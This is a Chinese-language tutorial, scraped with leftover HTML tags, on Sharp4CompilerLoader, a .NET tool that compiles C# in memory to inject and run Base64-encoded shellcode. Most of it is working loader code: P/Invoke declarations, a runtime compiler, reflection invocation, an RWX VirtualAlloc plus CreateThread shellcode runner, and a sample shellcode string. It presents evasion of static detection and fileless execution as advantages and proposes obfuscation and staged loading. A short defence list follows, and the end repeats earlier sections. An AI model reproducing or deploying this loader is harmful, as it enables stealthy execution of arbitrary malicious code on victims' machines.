.NET动态编译与Shellcode注入技术详解<\/h1>

1. 概述<\/h2>
Sharp4CompilerLoader是一种利用.NET动态编译技术实现Shellcode注入的加载器，它通过接收Base64编码的Shellcode字符串，将其注入到本地线程中执行恶意代码。本文将详细解析其核心技术原理和实现方法。<\/p>

2. Windows API关键函数<\/h2>

2.1 VirtualAlloc函数<\/h3>

VirtualAlloc是Windows API中用于内存分配的核心函数，在.NET中可以通过P\/Invoke调用：<\/p>

[DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]<\/span>
<\/span><\/span>private<\/span> static<\/span> extern<\/span> UInt32 VirtualAlloc(
<\/span><\/span>    UInt32 lpStartAddr,    \/\/ 内存起始地址<\/span>
<\/span><\/span>    UInt32 size,           \/\/ 分配内存大小(字节)<\/span>
<\/span><\/span>    UInt32 flAllocationType, \/\/ 分配类型<\/span>
<\/span><\/span>    UInt32 flProtect       \/\/ 内存保护属性<\/span>
<\/span><\/span>);
<\/span><\/span><\/code><\/pre>参数详解：<\/strong><\/p>

lpStartAddr<\/code>：内存起始地址，通常设为0由系统自动选择<\/li>
size<\/code>：要分配的内存大小<\/li>
flAllocationType<\/code>：分配类型标志

MEM_COMMIT (0x1000)<\/code>：提交物理内存<\/li>
MEM_RESERVE (0x2000)<\/code>：保留虚拟地址空间<\/li>
<\/ul>
<\/li>
flProtect<\/code>：内存保护属性

PAGE_EXECUTE_READWRITE (0x40)<\/code>：可执行、可读、可写<\/li>
<\/ul>
<\/li>
<\/ul>
DllImport特性说明：<\/strong><\/p>

SetLastError = true<\/code>：允许获取通过GetLastError返回的错误代码<\/li>
ExactSpelling = true<\/code>：要求精确匹配函数名，不自动处理ANSI\/Unicode变体<\/li>
<\/ul>
2.2 CreateThread函数<\/h3>
CreateThread用于在目标进程中创建新线程：<\/p>
[DllImport("kernel32.dll", SetLastError = true)]<\/span>
<\/span><\/span>private<\/span> static<\/span> extern<\/span> IntPtr CreateThread(
<\/span><\/span>    UInt32 lpThreadAttributes, \/\/ 线程安全属性<\/span>
<\/span><\/span>    UInt32 dwStackSize,        \/\/ 初始堆栈大小<\/span>
<\/span><\/span>    UInt32 lpStartAddress,     \/\/ 线程起始地址(函数指针)<\/span>
<\/span><\/span>    IntPtr param,              \/\/ 传递给线程的参数<\/span>
<\/span><\/span>    UInt32 dwCreationFlags,    \/\/ 创建标志<\/span>
<\/span><\/span>    ref<\/span> UInt32 lpThreadId      \/\/ 接收线程ID<\/span>
<\/span><\/span>);
<\/span><\/span><\/code><\/pre>参数详解：<\/strong><\/p>

lpThreadAttributes<\/code>：线程安全属性，通常设为0<\/li>
dwStackSize<\/code>：堆栈大小，0表示使用默认大小<\/li>
lpStartAddress<\/code>：线程开始执行的函数指针<\/li>
param<\/code>：传递给线程函数的参数<\/li>
dwCreationFlags<\/code>：创建标志

0<\/code>：线程创建后立即执行<\/li>
CREATE_SUSPENDED (0x4)<\/code>：创建后挂起<\/li>
<\/ul>
<\/li>
lpThreadId<\/code>：输出参数，接收线程ID<\/li>
<\/ul>
3. .NET动态编译技术<\/h2>
3.1 动态编译流程<\/h3>
private<\/span> static<\/span> Assembly BuildAssembly(string<\/span> code)
<\/span><\/span>{
<\/span><\/span>    Microsoft.CSharp.CSharpCodeProvider provider = new<\/span> CSharpCodeProvider();
<\/span><\/span>    ICodeCompiler compiler = provider.CreateCompiler();
<\/span><\/span>    CompilerParameters compilerparams = new<\/span> CompilerParameters();
<\/span><\/span>    compilerparams.GenerateExecutable = false<\/span>; \/\/ 生成DLL而非EXE<\/span>
<\/span><\/span>    compilerparams.GenerateInMemory = true<\/span>;    \/\/ 内存中编译，不留文件<\/span>
<\/span><\/span>    CompilerResults results = compiler.CompileAssemblyFromSource(compilerparams, code);
<\/span><\/span>    return<\/span> results.CompiledAssembly;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>关键点：<\/strong><\/p>

CSharpCodeProvider<\/code>：提供对C#编译器的访问<\/li>
GenerateInMemory = true<\/code>：提高安全性，避免磁盘残留<\/li>
ICodeCompiler<\/code>：虽然已过时，但仍可用于兼容性场景<\/li>
<\/ul>
3.2 动态调用方法<\/h3>
public<\/span> static<\/span> object<\/span> function1(string<\/span> code, string<\/span> namespacename, 
<\/span><\/span>    string<\/span> classname, string<\/span> functionname, bool<\/span> isstatic, params<\/span> object<\/span>[] args)
<\/span><\/span>{
<\/span><\/span>    object<\/span> returnval = null<\/span>;
<\/span><\/span>    Assembly asm = BuildAssembly(code);
<\/span><\/span>    object<\/span> instance = null<\/span>;
<\/span><\/span>    Type type = null<\/span>;
<\/span><\/span>    
<\/span><\/span>    if<\/span>(isstatic) {
<\/span><\/span>        type = asm.GetType(namespacename + "."<\/span> + classname);
<\/span><\/span>    } else<\/span> {
<\/span><\/span>        instance = asm.CreateInstance(namespacename + "."<\/span> + classname);
<\/span><\/span>        type = instance.GetType();
<\/span><\/span>    }
<\/span><\/span>    
<\/span><\/span>    MethodInfo method = type.GetMethod(functionname);
<\/span><\/span>    returnval = method.Invoke(instance, args);
<\/span><\/span>    return<\/span> returnval;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>反射调用流程：<\/strong><\/p>

动态编译源代码获取Assembly对象<\/li>
根据是否为静态方法决定是否创建实例<\/li>
通过反射获取方法信息<\/li>
使用MethodInfo.Invoke调用方法<\/li>
<\/ol>
4. Shellcode注入实现<\/h2>
4.1 动态编译的Shellcode执行代码<\/h3>
string<\/span> code = @"
<\/span><\/span><\/span>using System;
<\/span><\/span><\/span>using System.Reflection;
<\/span><\/span><\/span>using System.Runtime.InteropServices;
<\/span><\/span><\/span>
<\/span><\/span><\/span>namespace Namespace {
<\/span><\/span><\/span>    class Program {
<\/span><\/span><\/span>        private static UInt32 MEM_COMMIT = 0x1000;
<\/span><\/span><\/span>        private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;
<\/span><\/span><\/span>        
<\/span><\/span><\/span>        [DllImport(""kernel32"")]
<\/span><\/span><\/span>        private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr, UInt32 size, 
<\/span><\/span><\/span>            UInt32 flAllocationType, UInt32 flProtect);
<\/span><\/span><\/span>            
<\/span><\/span><\/span>        [DllImport(""kernel32"")]
<\/span><\/span><\/span>        private static extern IntPtr CreateThread(
<\/span><\/span><\/span>            UInt32 lpThreadAttributes, UInt32 dwStackSize, UInt32 lpStartAddress,
<\/span><\/span><\/span>            IntPtr param, UInt32 dwCreationFlags, ref UInt32 lpThreadId);
<\/span><\/span><\/span>            
<\/span><\/span><\/span>        [DllImport(""kernel32"")]
<\/span><\/span><\/span>        private static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);
<\/span><\/span><\/span>        
<\/span><\/span><\/span>        public void run() {
<\/span><\/span><\/span>            byte[] shellcode = Convert.FromBase64String("""<\/span> + shellcodeBase64 + @""");
<\/span><\/span><\/span>            UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length, 
<\/span><\/span><\/span>                MEM_COMMIT, PAGE_EXECUTE_READWRITE);
<\/span><\/span><\/span>            Marshal.Copy(shellcode, 0, (IntPtr)(funcAddr), shellcode.Length);
<\/span><\/span><\/span>            
<\/span><\/span><\/span>            IntPtr hThread = IntPtr.Zero;
<\/span><\/span><\/span>            UInt32 threadId = 0;
<\/span><\/span><\/span>            IntPtr pinfo = IntPtr.Zero;
<\/span><\/span><\/span>            
<\/span><\/span><\/span>            hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
<\/span><\/span><\/span>            WaitForSingleObject(hThread, 0xFFFFFFFF);
<\/span><\/span><\/span>        }
<\/span><\/span><\/span>    }
<\/span><\/span><\/span>}"<\/span>;
<\/span><\/span>
<\/span><\/span>function1(code, "Namespace"<\/span>, "Program"<\/span>, "run"<\/span>, false<\/span>, null<\/span>);
<\/span><\/span><\/code><\/pre>执行流程：<\/strong><\/p>

将Base64编码的Shellcode解码为字节数组<\/li>
使用VirtualAlloc分配可执行内存<\/li>
将Shellcode复制到分配的内存中<\/li>
创建线程执行Shellcode<\/li>
等待线程执行完成<\/li>
<\/ol>
4.2 Shellcode示例<\/h3>
示例Base64编码的Shellcode（启动计算器）：<\/p>
\/OiCAAAAYInlMcBki1Awi1IMi1IUi3IoD7dKJjH\/rDxhfAIsIMHPDQHH4vJSV4tSEItKPItMEXjjSAHRUYtZIAHTi0kY4zpJizSLAdYx\/6zBzw0BxzjgdfYDffg7fSR15FiLWCQB02aLDEuLWBwB04sEiwHQiUQkJFtbYVlaUf\/gX19aixLrjV1qAY2FsgAAAFBoMYtvh\/\/Vu\/C1olZoppW9nf\/VPAZ8CoD74HUFu0cTcm9qAFP\/1WNhbGMuZXhlAA==
<\/code><\/pre>
5. 技术总结<\/h2>


动态编译优势<\/strong>：<\/p>

避免静态检测：代码在运行时生成<\/li>
灵活性高：可根据环境动态调整<\/li>
无文件落地：GenerateInMemory选项<\/li>
<\/ul>
<\/li>

注入流程<\/strong>：<\/p>

内存分配 → Shellcode写入 → 线程创建 → 执行<\/li>
<\/ul>
<\/li>

防御思路<\/strong>：<\/p>

监控动态编译行为<\/li>
检测VirtualAlloc+PAGE_EXECUTE_READWRITE组合<\/li>
限制非信任代码的反射调用能力<\/li>
<\/ul>
<\/li>

扩展应用<\/strong>：<\/p>

可结合混淆技术增强隐蔽性<\/li>
可分段加载Shellcode规避检测<\/li>
可适配多种注入技术（如APC注入、线程劫持等）<\/li>
<\/ul>
<\/li>
<\/ol>
本技术展示了.NET平台强大的动态能力，同时也提醒了运行时安全监控的重要性。在实际应用中，应严格遵守法律法规，仅用于授权测试和研究目的。<\/p>

.NET动态编译与Shellcode注入技术详解<\/h1>

1. 概述<\/h2> Sharp4CompilerLoader是一种利用.NET动态编译技术实现Shellcode注入的加载器，它通过接收Base64编码的Shellcode字符串，将其注入到本地线程中执行恶意代码。本文将详细解析其核心技术原理和实现方法。<\/p>

2. Windows API关键函数<\/h2>

3. .NET动态编译技术<\/h2>

4. Shellcode注入实现<\/h2>

1. 概述<\/h2>
Sharp4CompilerLoader是一种利用.NET动态编译技术实现Shellcode注入的加载器，它通过接收Base64编码的Shellcode字符串，将其注入到本地线程中执行恶意代码。本文将详细解析其核心技术原理和实现方法。<\/p>